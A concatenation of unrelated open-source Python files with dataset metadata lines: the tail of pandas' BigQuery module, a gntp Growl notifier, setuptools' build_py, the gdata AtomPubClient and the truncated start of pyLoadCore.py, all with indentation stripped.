a new table in Google BigQuery without specifying
a schema describing the DataFrame.
"""
pass
class InvalidSchema(PandasError, IOError):
"""
Raised when attempting to write a DataFrame to
Google BigQuery with an invalid table schema.
"""
pass
class TableExistsFail(PandasError, IOError):
"""
Raised when attempting to write a DataFrame to
an existing Google BigQuery table without specifying
that a replace/update action be taken.
"""
pass
class InvalidColumnOrder(PandasError, IOError):
"""
Raised when the provided column order for output
results DataFrame does not match the schema
returned by BigQuery.
"""
pass
def _authenticate():
"""
For testing, we abstract the authentication to BigQuery API.
Presently this is implemented using the bq.py Client.Get()
method. Any exceptions raised are considered fatal, so we
do not process them.
Returns
-------
BigqueryClient : Configured connection to Google BigQuery
"""
return bq.Client.Get()
def _parse_entry(field_value, field_type):
"""
Given a value and the corresponding BigQuery data type,
perform any operations needed and return in a format
appropriate for a numpy record dictionary
Parameters
----------
field_value : Source object to be transformed
field_type : String representation of Google BigQuery
data type (per schema)
Returns
-------
field_value : object or primitive of type corresponding
to field_type
"""
# Avoid any casting problems
if field_value is None or field_value == 'null':
return None
if field_type == 'INTEGER' or field_type == 'FLOAT':
field_value = float(field_value)
elif field_type == 'TIMESTAMP':
timestamp = datetime.utcfromtimestamp(float(field_value))
field_value = np.datetime64(timestamp)
elif field_type == 'BOOLEAN':
field_value = field_value == 'true'
# Note that results are unicode, so this will
# fail for non-ASCII characters.. this probably
# functions differently in Python 3
else:
field_value = str(field_value)
return field_value
def _parse_page(raw_page, col_names, col_types, col_dtypes):
"""
Given a list of rows produced by the client.apiclient.tabledata().list(),
build a numpy array with proper dtypes and column names as specified
by the arguments.
Parameters
----------
raw_page : Resulting list of rows from a page retrieved via
bigquery API
client.apiclient.tabledata().list().execute()['rows']
col_names: An ordered list of names for the columns
col_types: String representation of the BigQuery DataType for that
column
col_dtypes: Target numpy.dtype for the column
Returns
-------
page_array : numpy record array corresponding
to the page data
"""
# Should be at most 100,000 per the API, but this could
# be increased in the future. Should only be less than
# this for the last page to reduce API calls
page_row_count = len(raw_page)
# Place to hold the results for a page of data
page_array = np.zeros((page_row_count,), dtype=zip(col_names, col_dtypes))
for row_num, raw_row in enumerate(raw_page):
entries = raw_row.get('f', [])
# Iterate over each entry - setting proper field types
for col_num, field_type in enumerate(col_types):
# Process the field's types using schema
field_value = _parse_entry(entries[col_num].get('v', ''),
field_type)
# Fill the value into the final array
page_array[row_num][col_num] = field_value
return page_array
def _parse_data(client, job, index_col=None, col_order=None):
"""
Iterate through the query results and piece together the
final DataFrame. Builds a DataFrame for each page of
results, then concatenates them together when finished.
To save memory, we use numpy record arrays to build these
DataFrames.
Parameters
----------
client: An instance of bq.Client
job: An array containing the job info for a completed query
index_col: str (optional)
Name of result column to use for index in results DataFrame
col_order: list() (optional)
List of BigQuery column names in the desired order for results
DataFrame
Returns
-------
df: pandas DataFrame
DataFrame representing results of query
Raises:
------
InvalidColumnOrder:
Raised if 'col_order' parameter doesn't match returned DataFrame
BigqueryError:
Raised by bigquery_client if a Google API error is encountered
Notes:
-----
This script relies on Google being consistent with their
pagination API. We are using the most flexible iteration method
that we could find in the bq.py/bigquery_client.py API's, but
these have undergone large amounts of change recently.
"""
# dtype Map -
# see: http://pandas.pydata.org/pandas-docs/dev/missing_data.html#missing-data-casting-rules-and-indexing
dtype_map = {'INTEGER': np.dtype(float),
'FLOAT': np.dtype(float),
'TIMESTAMP': 'M8[ns]'} # This seems to be buggy without
# nanosecond indicator
# We first need the schema to get information about the columns of
# our dataframe.
table_dict = job['configuration']['query']['destinationTable']
fields = client.GetTableSchema(table_dict)['fields']
# Get the schema into a format useable to create our
# dataframe
col_dtypes = []
col_types = []
col_names = []
# TODO: Do this in one clean step
for field in fields:
col_types.append(field['type'])
# Note the encoding... numpy doesn't like titles that are UTF8, which
# is the return type from the API
col_names.append(field['name'].encode('ascii', 'ignore'))
# Note, it would be nice to use 'str' types, but BigQuery doesn't have
# a fixed length in mind - just maxes out at 64k
col_dtypes.append(dtype_map.get(field['type'], object))
# How many columns are there
num_columns = len(col_names)
# Iterate over the result rows.
# Since Google's API now requires pagination of results,
# we do that here. The following is repurposed from
# bigquery_client.py :: Client._JobTableReader._ReadOnePage
# TODO: Enable Reading From Table,
# see Client._TableTableReader._ReadOnePage
# Initially, no page token is set
page_token = None
# This number is the current max results per page
max_rows = bigquery_client._MAX_ROWS_PER_REQUEST
# How many rows in result set? Initialize to max_rows
total_rows = max_rows
# This is the starting row for a particular page...
# is ignored if page_token is present, though
# it may be useful if we wish to implement SQL like LIMITs
# with minimums
start_row = 0
# Keep our page DataFrames until the end when we concatenate them
dataframe_list = list()
current_job = job['jobReference']
# Iterate over all rows
while start_row < total_rows:
# Setup the parameters for getQueryResults() API Call
kwds = dict(current_job)
kwds['maxResults'] = max_rows
# Sets the timeout to 0 because we assume the table is already ready.
# This is because our previous call to Query() is synchronous
# and will block until it's actually done
kwds['timeoutMs'] = 0
# Use start row if there's no page_token ... in other words, the
# user requested to start somewhere other than the beginning...
# presently this is not a parameter to read_gbq(), but it will be
# added eventually.
if page_token:
kwds['pageToken'] = page_token
else:
kwds['startIndex'] = start_row
data = client.apiclient.jobs().getQueryResults(**kwds).execute()
if not data['jobComplete']:
raise bigquery_client.BigqueryError('Job was not completed, or was invalid')
# How many rows are there across all pages?
# Note: This is presently the only reason we don't just use
# _ReadOnePage() directly
total_rows = int(data['totalRows'])
page_token = data.get('pageToken', None)
raw_page = data.get('rows', [])
page_array = _parse_page(raw_page, col_names, col_types, col_dtypes)
start_row += len(raw_page)
if total_rows > 0:
completed = (100 * start_row) / total_rows
logger.info('Remaining Rows: ' + str(total_rows - start_row) + '('
+ str(completed) + '% Complete)')
else:
logger.info('No Rows')
dataframe_list.append(DataFrame(page_array))
# Did we get enough rows? Note: gbq.py stopped checking for this
# but we felt it was still a good idea.
if not page_token and not raw_page and start_row != total_rows:
raise bigquery_client.BigqueryInterfaceError(
'Not enough rows returned by server. Expected: {0} Rows, But '
'Received {1}'.format(total_rows, start_row)
)
# Build final dataframe
final_df = concat(dataframe_list, ignore_index=True)
# Reindex the DataFrame on the provided column
if index_col is not None:
if index_col in col_names:
final_df.set_index(index_col, inplace=True)
col_names.remove(index_col)
else:
raise InvalidColumnOrder(
'Index column "{0}" does not exist in DataFrame.'
.format(index_col)
)
# Change the order of columns in the DataFrame based on provided list
if col_order is not None:
if sorted(col_order) == sorted(col_names):
final_df = final_df[col_order]
else:
raise InvalidColumnOrder(
'Column order does not match this DataFrame.'
)
# Downcast floats to integers and objects to booleans
# if there are no NaN's. This is presently due to a
# limitation of numpy in handling missing data.
final_df._data = final_df._data.downcast(dtypes='infer')
return final_df
def to_gbq(dataframe, destination_table, schema=None, col_order=None,
if_exists='fail', **kwargs):
"""Write a DataFrame to a Google BigQuery table.
THIS IS AN EXPERIMENTAL LIBRARY
If the table exists, the DataFrame will be appended. If not, a new table
will be created, in which case the schema will have to be specified. By
default, rows will be written in the order they appear in the DataFrame,
though the user may specify an alternative order.
Parameters
----------
dataframe : DataFrame
DataFrame to be written
destination_table : string
name of table to be written, in the form 'dataset.tablename'
schema : sequence (optional)
list of column types in order for data to be inserted,
e.g. ['INTEGER', 'TIMESTAMP', 'BOOLEAN']
col_order : sequence (optional)
order which columns are to be inserted,
e.g. ['primary_key', 'birthday', 'username']
if_exists : {'fail', 'replace', 'append'} (optional)
- fail: If table exists, do nothing.
- replace: If table exists, drop it, recreate it, and insert data.
- append: If table exists, insert data. Create if does not exist.
kwargs are passed to the Client constructor
Raises
------
SchemaMissing :
Raised if the 'if_exists' parameter is set to 'replace', but no schema
is specified
TableExists :
Raised if the specified 'destination_table' exists but the 'if_exists'
parameter is set to 'fail' (the default)
InvalidSchema :
Raised if the 'schema' parameter does not match the provided DataFrame
"""
if not _BQ_INSTALLED:
if sys.version_info >= (3, 0):
raise NotImplementedError('gbq module does not support Python 3 '
'yet')
else:
raise ImportError('Could not import Google BigQuery Client.')
if not _BQ_VALID_VERSION:
raise ImportError("pandas requires bigquery >= 2.0.17 for Google "
"BigQuery support, current version " + _BQ_VERSION)
ALLOWED_TYPES = ['STRING', 'INTEGER', 'FLOAT', 'BOOLEAN', 'TIMESTAMP',
'RECORD']
if if_exists == 'replace' and schema is None:
raise SchemaMissing('Cannot replace a table without specifying the '
'data schema')
else:
client = _authenticate()
table_reference = client.GetTableReference(destination_table)
if client.TableExists(table_reference):
if if_exists == 'fail':
raise TableExistsFail('Cannot overwrite existing tables if '
'\'if_exists="fail"\'')
else:
# Build up a string representation of the
# table's schema. Since the table already
# exists, we ask ask the API for it, which
# is returned in a list of dictionaries
# describing column data. Iterate over these
# and build up a string of form:
# "col_name1 : col_type1, col_name2 : col_type2..."
schema_full = client.GetTableSchema(
dict(table_reference)
)['fields']
schema = ''
for count, row in enumerate(schema_full):
if count > 0:
schema += ', '
schema += row['name'] + ':' + row['type']
else:
logger.info('Creating New Table')
if schema is None:
raise SchemaMissing('Cannot create a new table without '
'specifying the data schema')
else:
columns = dataframe.columns
if len(schema) != len(columns):
raise InvalidSchema('Incorrect number of columns in '
'schema')
else:
schema_string = ''
for count, name in enumerate(columns):
if count > 0:
schema_string += ', '
column_type = schema[count].upper()
if column_type in ALLOWED_TYPES:
schema_string += name + ':' + schema[count].lower()
else:
raise InvalidSchema('Invalid Type: ' + column_type
+ ". Must be one of: " +
str(ALLOWED_TYPES))
schema = schema_string
opts = kwargs
opts['sync'] = True
opts['skip_leading_rows'] = 1
opts['encoding'] = 'UTF-8'
opts['max_bad_records'] = 0
# See: https://developers.google.com/bigquery/docs/reference/v2/jobs
if if_exists == 'replace':
opts['write_disposition'] = 'WRITE_TRUNCATE'
elif if_exists == 'append':
opts['write_disposition'] = 'WRITE_APPEND'
with tempfile.NamedTemporaryFile() as csv_file:
dataframe.to_csv(csv_file.name, index=False, encoding='utf-8')
job = client.Load(table_reference, csv_file.name, schema=schema,
**opts)
def read_gbq(query, project_id=None, destination_table=None, index_col=None,
col_order=None, **kwargs):
"""Load data from Google BigQuery.
THIS IS AN EXPERIMENTAL LIBRARY
The main method a user calls to load data from Google BigQuery into a
pandas DataFrame. This is a simple wrapper for Google's bq.py and
bigquery_client.py, which we use to get the source data. Because of this,
this script respects the user's bq settings file, '~/.bigqueryrc', if it
exists. Such a file can be generated using 'bq init'. Further, additional
parameters for the query can be specified as either ``**kwds`` in the
command, or using FLAGS provided in the 'gflags' module. Particular options
can be found in bigquery_client.py.
Parameters
----------
query : str
SQL-Like Query to return data values
project_id : str (optional)
Google BigQuery Account project ID. Optional, since it may be
located in ~/.bigqueryrc
index_col : str (optional)
Name of result column to use for index in results DataFrame
col_order : list(str) (optional)
List of BigQuery column names in the desired order for results
DataFrame
destination_table : string (optional)
If provided, send the results to the given table.
**kwargs :
To be passed to bq.Client.Create(). Particularly: 'trace',
'sync', 'api', 'api_version'
Returns
-------
df: DataFrame
DataFrame representing results of query
"""
if not _BQ_INSTALLED:
if sys.version_info >= (3, 0):
raise NotImplementedError('gbq module does not support Python 3 '
'yet')
else:
raise ImportError('Could not import Google BigQuery Client.')
if not _BQ_VALID_VERSION:
raise ImportError('pandas requires bigquery >= 2.0.17 for Google '
'BigQuery support, current version ' + _BQ_VERSION)
query_args = kwargs
query_args['project_id'] = project_id
query_args['query'] = query
query_args['destination_table'] = destination_table
query_args['sync'] = True
client = _authenticate()
job = client.Query(**query_args)
return _parse_data(client, job, index_col=index_col, col_order=col_order)
|
gpl-3.0
|
cyberden/CouchPotatoServer
|
libs/gntp/notifier.py
|
122
|
8299
|
# Copyright: 2013 Paul Traylor
# These sources are released under the terms of the MIT license: see LICENSE
"""
The gntp.notifier module is provided as a simple way to send notifications
using GNTP
.. note::
This class is intended to mostly mirror the older Python bindings such
that you should be able to replace instances of the old bindings with
this class.
`Original Python bindings <http://code.google.com/p/growl/source/browse/Bindings/python/Growl.py>`_
"""
import logging
import platform
import socket
import sys
from gntp.version import __version__
import gntp.core
import gntp.errors as errors
import gntp.shim
__all__ = [
'mini',
'GrowlNotifier',
]
logger = logging.getLogger(__name__)
class GrowlNotifier(object):
"""Helper class to simplfy sending Growl messages
:param string applicationName: Sending application name
:param list notification: List of valid notifications
:param list defaultNotifications: List of notifications that should be enabled
by default
:param string applicationIcon: Icon URL
:param string hostname: Remote host
:param integer port: Remote port
"""
passwordHash = 'MD5'
socketTimeout = 3
def __init__(self, applicationName='Python GNTP', notifications=[],
defaultNotifications=None, applicationIcon=None, hostname='localhost',
password=None, port=23053):
self.applicationName = applicationName
self.notifications = list(notifications)
if defaultNotifications:
self.defaultNotifications = list(defaultNotifications)
else:
self.defaultNotifications = self.notifications
self.applicationIcon = applicationIcon
self.password = password
self.hostname = hostname
self.port = int(port)
def _checkIcon(self, data):
'''
Check the icon to see if it's valid
If it's a simple URL icon, then we return True. If it's a data icon
then we return False
'''
logger.info('Checking icon')
return gntp.shim.u(data).startswith('http')
def register(self):
"""Send GNTP Registration
.. warning::
Before sending notifications to Growl, you need to have
sent a registration message at least once
"""
logger.info('Sending registration to %s:%s', self.hostname, self.port)
register = gntp.core.GNTPRegister()
register.add_header('Application-Name', self.applicationName)
for notification in self.notifications:
enabled = notification in self.defaultNotifications
register.add_notification(notification, enabled)
if self.applicationIcon:
if self._checkIcon(self.applicationIcon):
register.add_header('Application-Icon', self.applicationIcon)
else:
resource = register.add_resource(self.applicationIcon)
register.add_header('Application-Icon', resource)
if self.password:
register.set_password(self.password, self.passwordHash)
self.add_origin_info(register)
self.register_hook(register)
return self._send('register', register)
def notify(self, noteType, title, description, icon=None, sticky=False,
priority=None, callback=None, identifier=None, custom={}):
"""Send a GNTP notifications
.. warning::
Must have registered with growl beforehand or messages will be ignored
:param string noteType: One of the notification names registered earlier
:param string title: Notification title (usually displayed on the notification)
:param string description: The main content of the notification
:param string icon: Icon URL path
:param boolean sticky: Sticky notification
:param integer priority: Message priority level from -2 to 2
:param string callback: URL callback
:param dict custom: Custom attributes. Key names should be prefixed with X-
according to the spec but this is not enforced by this class
.. warning::
For now, only URL callbacks are supported. In the future, the
callback argument will also support a function
"""
logger.info('Sending notification [%s] to %s:%s', noteType, self.hostname, self.port)
assert noteType in self.notifications
notice = gntp.core.GNTPNotice()
notice.add_header('Application-Name', self.applicationName)
notice.add_header('Notification-Name', noteType)
notice.add_header('Notification-Title', title)
if self.password:
notice.set_password(self.password, self.passwordHash)
if sticky:
notice.add_header('Notification-Sticky', sticky)
if priority:
notice.add_header('Notification-Priority', priority)
if icon:
if self._checkIcon(icon):
notice.add_header('Notification-Icon', icon)
else:
resource = notice.add_resource(icon)
notice.add_header('Notification-Icon', resource)
if description:
notice.add_header('Notification-Text', description)
if callback:
notice.add_header('Notification-Callback-Target', callback)
if identifier:
notice.add_header('Notification-Coalescing-ID', identifier)
for key in custom:
notice.add_header(key, custom[key])
self.add_origin_info(notice)
self.notify_hook(notice)
return self._send('notify', notice)
def subscribe(self, id, name, port):
"""Send a Subscribe request to a remote machine"""
sub = gntp.core.GNTPSubscribe()
sub.add_header('Subscriber-ID', id)
sub.add_header('Subscriber-Name', name)
sub.add_header('Subscriber-Port', port)
if self.password:
sub.set_password(self.password, self.passwordHash)
self.add_origin_info(sub)
self.subscribe_hook(sub)
return self._send('subscribe', sub)
def add_origin_info(self, packet):
"""Add optional Origin headers to message"""
packet.add_header('Origin-Machine-Name', platform.node())
packet.add_header('Origin-Software-Name', 'gntp.py')
packet.add_header('Origin-Software-Version', __version__)
packet.add_header('Origin-Platform-Name', platform.system())
packet.add_header('Origin-Platform-Version', platform.platform())
def register_hook(self, packet):
pass
def notify_hook(self, packet):
pass
def subscribe_hook(self, packet):
pass
def _send(self, messagetype, packet):
"""Send the GNTP Packet"""
packet.validate()
data = packet.encode()
logger.debug('To : %s:%s <%s>\n%s', self.hostname, self.port, packet.__class__, data)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.socketTimeout)
try:
s.connect((self.hostname, self.port))
s.send(data)
recv_data = s.recv(1024)
while not recv_data.endswith(gntp.shim.b("\r\n\r\n")):
recv_data += s.recv(1024)
except socket.error:
# Python2.5 and Python3 compatibile exception
exc = sys.exc_info()[1]
raise errors.NetworkError(exc)
response = gntp.core.parse_gntp(recv_data)
s.close()
logger.debug('From : %s:%s <%s>\n%s', self.hostname, self.port, response.__class__, response)
if type(response) == gntp.core.GNTPOK:
return True
logger.error('Invalid response: %s', response.error())
return response.error()
def mini(description, applicationName='PythonMini', noteType="Message",
title="Mini Message", applicationIcon=None, hostname='localhost',
password=None, port=23053, sticky=False, priority=None,
callback=None, notificationIcon=None, identifier=None,
notifierFactory=GrowlNotifier):
"""Single notification function
Simple notification function in one line. Has only one required parameter
and attempts to use reasonable defaults for everything else
:param string description: Notification message
.. warning::
For now, only URL callbacks are supported. In the future, the
callback argument will also support a function
"""
try:
growl = notifierFactory(
applicationName=applicationName,
notifications=[noteType],
defaultNotifications=[noteType],
applicationIcon=applicationIcon,
hostname=hostname,
password=password,
port=port,
)
result = growl.register()
if result is not True:
return result
return growl.notify(
noteType=noteType,
title=title,
description=description,
icon=notificationIcon,
sticky=sticky,
priority=priority,
callback=callback,
identifier=identifier,
)
except Exception:
# We want the "mini" function to be simple and swallow Exceptions
# in order to be less invasive
logger.exception("Growl error")
if __name__ == '__main__':
# If we're running this module directly we're likely running it as a test
# so extra debugging is useful
logging.basicConfig(level=logging.INFO)
mini('Testing mini notification')
|
gpl-3.0
|
VigTech/Vigtech-Services
|
env/lib/python2.7/site-packages/setuptools/command/build_py.py
|
301
|
7915
|
from glob import glob
from distutils.util import convert_path
import distutils.command.build_py as orig
import os
import sys
import fnmatch
import textwrap
try:
from setuptools.lib2to3_ex import Mixin2to3
except ImportError:
class Mixin2to3:
def run_2to3(self, files, doctests=True):
"do nothing"
class build_py(orig.build_py, Mixin2to3):
"""Enhanced 'build_py' command that includes data files with packages
The data files are specified via a 'package_data' argument to 'setup()'.
See 'setuptools.dist.Distribution' for more details.
Also, this version of the 'build_py' command allows you to specify both
'py_modules' and 'packages' in the same setup operation.
"""
def finalize_options(self):
orig.build_py.finalize_options(self)
self.package_data = self.distribution.package_data
self.exclude_package_data = (self.distribution.exclude_package_data or
{})
if 'data_files' in self.__dict__:
del self.__dict__['data_files']
self.__updated_files = []
self.__doctests_2to3 = []
def run(self):
"""Build modules, packages, and copy data files to build directory"""
if not self.py_modules and not self.packages:
return
if self.py_modules:
self.build_modules()
if self.packages:
self.build_packages()
self.build_package_data()
self.run_2to3(self.__updated_files, False)
self.run_2to3(self.__updated_files, True)
self.run_2to3(self.__doctests_2to3, True)
# Only compile actual .py files, using our base class' idea of what our
# output files are.
self.byte_compile(orig.build_py.get_outputs(self, include_bytecode=0))
def __getattr__(self, attr):
if attr == 'data_files': # lazily compute data files
self.data_files = files = self._get_data_files()
return files
return orig.build_py.__getattr__(self, attr)
def build_module(self, module, module_file, package):
outfile, copied = orig.build_py.build_module(self, module, module_file,
package)
if copied:
self.__updated_files.append(outfile)
return outfile, copied
def _get_data_files(self):
"""Generate list of '(package,src_dir,build_dir,filenames)' tuples"""
self.analyze_manifest()
data = []
for package in self.packages or ():
# Locate package source directory
src_dir = self.get_package_dir(package)
# Compute package build directory
build_dir = os.path.join(*([self.build_lib] + package.split('.')))
# Length of path to strip from found files
plen = len(src_dir) + 1
# Strip directory from globbed filenames
filenames = [
file[plen:] for file in self.find_data_files(package, src_dir)
]
data.append((package, src_dir, build_dir, filenames))
return data
def find_data_files(self, package, src_dir):
"""Return filenames for package's data files in 'src_dir'"""
globs = (self.package_data.get('', [])
+ self.package_data.get(package, []))
files = self.manifest_files.get(package, [])[:]
for pattern in globs:
# Each pattern has to be converted to a platform-specific path
files.extend(glob(os.path.join(src_dir, convert_path(pattern))))
return self.exclude_data_files(package, src_dir, files)
def build_package_data(self):
"""Copy data files into build directory"""
for package, src_dir, build_dir, filenames in self.data_files:
for filename in filenames:
target = os.path.join(build_dir, filename)
self.mkpath(os.path.dirname(target))
srcfile = os.path.join(src_dir, filename)
outf, copied = self.copy_file(srcfile, target)
srcfile = os.path.abspath(srcfile)
if (copied and
srcfile in self.distribution.convert_2to3_doctests):
self.__doctests_2to3.append(outf)
def analyze_manifest(self):
self.manifest_files = mf = {}
if not self.distribution.include_package_data:
return
src_dirs = {}
for package in self.packages or ():
# Locate package source directory
src_dirs[assert_relative(self.get_package_dir(package))] = package
self.run_command('egg_info')
ei_cmd = self.get_finalized_command('egg_info')
for path in ei_cmd.filelist.files:
d, f = os.path.split(assert_relative(path))
prev = None
oldf = f
while d and d != prev and d not in src_dirs:
prev = d
d, df = os.path.split(d)
f = os.path.join(df, f)
if d in src_dirs:
if path.endswith('.py') and f == oldf:
continue # it's a module, not data
mf.setdefault(src_dirs[d], []).append(path)
def get_data_files(self):
pass # Lazily compute data files in _get_data_files() function.
def check_package(self, package, package_dir):
"""Check namespace packages' __init__ for declare_namespace"""
try:
return self.packages_checked[package]
except KeyError:
pass
init_py = orig.build_py.check_package(self, package, package_dir)
self.packages_checked[package] = init_py
if not init_py or not self.distribution.namespace_packages:
return init_py
for pkg in self.distribution.namespace_packages:
if pkg == package or pkg.startswith(package + '.'):
break
else:
return init_py
f = open(init_py, 'rbU')
if 'declare_namespace'.encode() not in f.read():
from distutils.errors import DistutilsError
raise DistutilsError(
"Namespace package problem: %s is a namespace package, but "
"its\n__init__.py does not call declare_namespace()! Please "
'fix it.\n(See the setuptools manual under '
'"Namespace Packages" for details.)\n"' % (package,)
)
f.close()
return init_py
def initialize_options(self):
self.packages_checked = {}
orig.build_py.initialize_options(self)
def get_package_dir(self, package):
res = orig.build_py.get_package_dir(self, package)
if self.distribution.src_root is not None:
return os.path.join(self.distribution.src_root, res)
return res
def exclude_data_files(self, package, src_dir, files):
"""Filter filenames for package's data files in 'src_dir'"""
globs = (self.exclude_package_data.get('', [])
+ self.exclude_package_data.get(package, []))
bad = []
for pattern in globs:
bad.extend(
fnmatch.filter(
files, os.path.join(src_dir, convert_path(pattern))
)
)
bad = dict.fromkeys(bad)
seen = {}
return [
f for f in files if f not in bad
and f not in seen and seen.setdefault(f, 1) # ditch dupes
]
def assert_relative(path):
if not os.path.isabs(path):
return path
from distutils.errors import DistutilsSetupError
msg = textwrap.dedent("""
Error: setup script specifies an absolute path:
%s
setup() arguments must *always* be /-separated paths relative to the
setup.py directory, *never* absolute paths.
""").lstrip() % path
raise DistutilsSetupError(msg)
|
lgpl-3.0
|
Godiyos/python-for-android
|
python3-alpha/extra_modules/atom/client.py
|
46
|
7854
|
#!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""AtomPubClient provides CRUD ops. in line with the Atom Publishing Protocol.
"""
__author__ = 'j.s@google.com (Jeff Scudder)'
import atom.http_core
class Error(Exception):
pass
class MissingHost(Error):
pass
class AtomPubClient(object):
host = None
auth_token = None
ssl = False # Whether to force all requests over https
xoauth_requestor_id = None
def __init__(self, http_client=None, host=None, auth_token=None, source=None,
xoauth_requestor_id=None, **kwargs):
"""Creates a new AtomPubClient instance.
Args:
source: The name of your application.
http_client: An object capable of performing HTTP requests through a
request method. This object is used to perform the request
when the AtomPubClient's request method is called. Used to
allow HTTP requests to be directed to a mock server, or use
an alternate library instead of the default of httplib to
make HTTP requests.
host: str The default host name to use if a host is not specified in the
requested URI.
auth_token: An object which sets the HTTP Authorization header when its
modify_request method is called.
"""
self.http_client = http_client or atom.http_core.ProxiedHttpClient()
if host is not None:
self.host = host
if auth_token is not None:
self.auth_token = auth_token
self.xoauth_requestor_id = xoauth_requestor_id
self.source = source
def request(self, method=None, uri=None, auth_token=None,
http_request=None, **kwargs):
"""Performs an HTTP request to the server indicated.
Uses the http_client instance to make the request.
Args:
method: The HTTP method as a string, usually one of 'GET', 'POST',
'PUT', or 'DELETE'
uri: The URI desired as a string or atom.http_core.Uri.
http_request:
auth_token: An authorization token object whose modify_request method
sets the HTTP Authorization header.
Returns:
The results of calling self.http_client.request. With the default
http_client, this is an HTTP response object.
"""
# Modify the request based on the AtomPubClient settings and parameters
# passed in to the request.
http_request = self.modify_request(http_request)
if isinstance(uri, str):
uri = atom.http_core.Uri.parse_uri(uri)
if uri is not None:
uri.modify_request(http_request)
if isinstance(method, str):
http_request.method = method
# Any unrecognized arguments are assumed to be capable of modifying the
# HTTP request.
for name, value in kwargs.items():
if value is not None:
value.modify_request(http_request)
# Default to an http request if the protocol scheme is not set.
if http_request.uri.scheme is None:
http_request.uri.scheme = 'http'
# Override scheme. Force requests over https.
if self.ssl:
http_request.uri.scheme = 'https'
if http_request.uri.path is None:
http_request.uri.path = '/'
# Add the Authorization header at the very end. The Authorization header
# value may need to be calculated using information in the request.
if auth_token:
auth_token.modify_request(http_request)
elif self.auth_token:
self.auth_token.modify_request(http_request)
# Check to make sure there is a host in the http_request.
if http_request.uri.host is None:
raise MissingHost('No host provided in request %s %s' % (
http_request.method, str(http_request.uri)))
# Perform the fully specified request using the http_client instance.
# Sends the request to the server and returns the server's response.
return self.http_client.request(http_request)
Request = request
def get(self, uri=None, auth_token=None, http_request=None, **kwargs):
"""Performs a request using the GET method, returns an HTTP response."""
return self.request(method='GET', uri=uri, auth_token=auth_token,
http_request=http_request, **kwargs)
Get = get
def post(self, uri=None, data=None, auth_token=None, http_request=None,
**kwargs):
"""Sends data using the POST method, returns an HTTP response."""
return self.request(method='POST', uri=uri, auth_token=auth_token,
http_request=http_request, data=data, **kwargs)
Post = post
def put(self, uri=None, data=None, auth_token=None, http_request=None,
**kwargs):
"""Sends data using the PUT method, returns an HTTP response."""
return self.request(method='PUT', uri=uri, auth_token=auth_token,
http_request=http_request, data=data, **kwargs)
Put = put
def delete(self, uri=None, auth_token=None, http_request=None, **kwargs):
"""Performs a request using the DELETE method, returns an HTTP response."""
return self.request(method='DELETE', uri=uri, auth_token=auth_token,
http_request=http_request, **kwargs)
Delete = delete
def modify_request(self, http_request):
"""Changes the HTTP request before sending it to the server.
Sets the User-Agent HTTP header and fills in the HTTP host portion
of the URL if one was not included in the request (for this it uses
the self.host member if one is set). This method is called in
self.request.
Args:
http_request: An atom.http_core.HttpRequest() (optional) If one is
not provided, a new HttpRequest is instantiated.
Returns:
An atom.http_core.HttpRequest() with the User-Agent header set and
if this client has a value in its host member, the host in the request
URL is set.
"""
if http_request is None:
http_request = atom.http_core.HttpRequest()
if self.host is not None and http_request.uri.host is None:
http_request.uri.host = self.host
if self.xoauth_requestor_id is not None:
http_request.uri.query['xoauth_requestor_id'] = self.xoauth_requestor_id
# Set the user agent header for logging purposes.
if self.source:
http_request.headers['User-Agent'] = '%s gdata-py/2.0.16' % self.source
else:
http_request.headers['User-Agent'] = 'gdata-py/2.0.16'
return http_request
ModifyRequest = modify_request
class CustomHeaders(object):
"""Add custom headers to an http_request.
Usage:
>>> custom_headers = atom.client.CustomHeaders(header1='value1',
header2='value2')
>>> client.get(uri, custom_headers=custom_headers)
"""
def __init__(self, **kwargs):
"""Creates a CustomHeaders instance.
Initialize the headers dictionary with the arguments list.
"""
self.headers = kwargs
def modify_request(self, http_request):
"""Changes the HTTP request before sending it to the server.
Adds the custom headers to the HTTP request.
Args:
http_request: An atom.http_core.HttpRequest().
Returns:
An atom.http_core.HttpRequest() with the added custom headers.
"""
for name, value in self.headers.items():
if value is not None:
http_request.headers[name] = value
return http_request
|
apache-2.0
|
kaarl/pyload
|
pyLoadCore.py
|
34
|
22485
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: spoob
@author: sebnapi
@author: RaNaN
@author: mkaay
@version: v0.4.9
"""
CURRENT_VERSION = '0.4.9'
import __builtin__
from getopt import getopt, GetoptError
import module.common.pylgettext as gettext
from imp import find_module
import logging
import logging.handlers
import os
from os import _exit, execl, getcwd, makedirs, remove, sep, walk, chdir, close
from os.path import exists, join
import signal
import subprocess
import sys
from sys import argv, executable, exit
from time import time, sleep
from traceback import print_exc
from module import InitHomeDir
from module.plugins.AccountManager import AccountManager
from module.CaptchaManager import CaptchaManager
from module.ConfigParser import ConfigParser
from module.plugins.PluginManager import PluginManager
from module.PullEvents import PullManager
from module.network.RequestFactory import RequestFactory
from module.web.ServerThread import WebServer
from module.Scheduler import Scheduler
from module.common.JsEngine import JsEngine
from module import remote
from module.remote.RemoteManager import RemoteManager
from module.database import DatabaseBackend, FileHandler
from module.utils import freeSpace, formatSize, get_console_encoding
from codecs import getwriter
enc = get_console_encoding(sys.stdout.encoding)
sys.stdout = getwriter(enc)(sys.stdout, errors="replace")
# TODO List
# - configurable auth system ldap/mysql
# - cron job like sheduler
class Core(object):
"""pyLoad Core, one tool to rule them all... (the filehosters) :D"""
def __init__(self):
self.doDebug = False
self.startedInGui = False
self.running = False
self.daemon = False
self.remote = True
self.arg_links = []
self.pidfile = "pyload.pid"
self.deleteLinks = False # will delete links on startup
if len(argv) > 1:
try:
options, args = getopt(argv[1:], 'vchdusqp:',
["version", "clear", "clean", "help", "debug", "user",
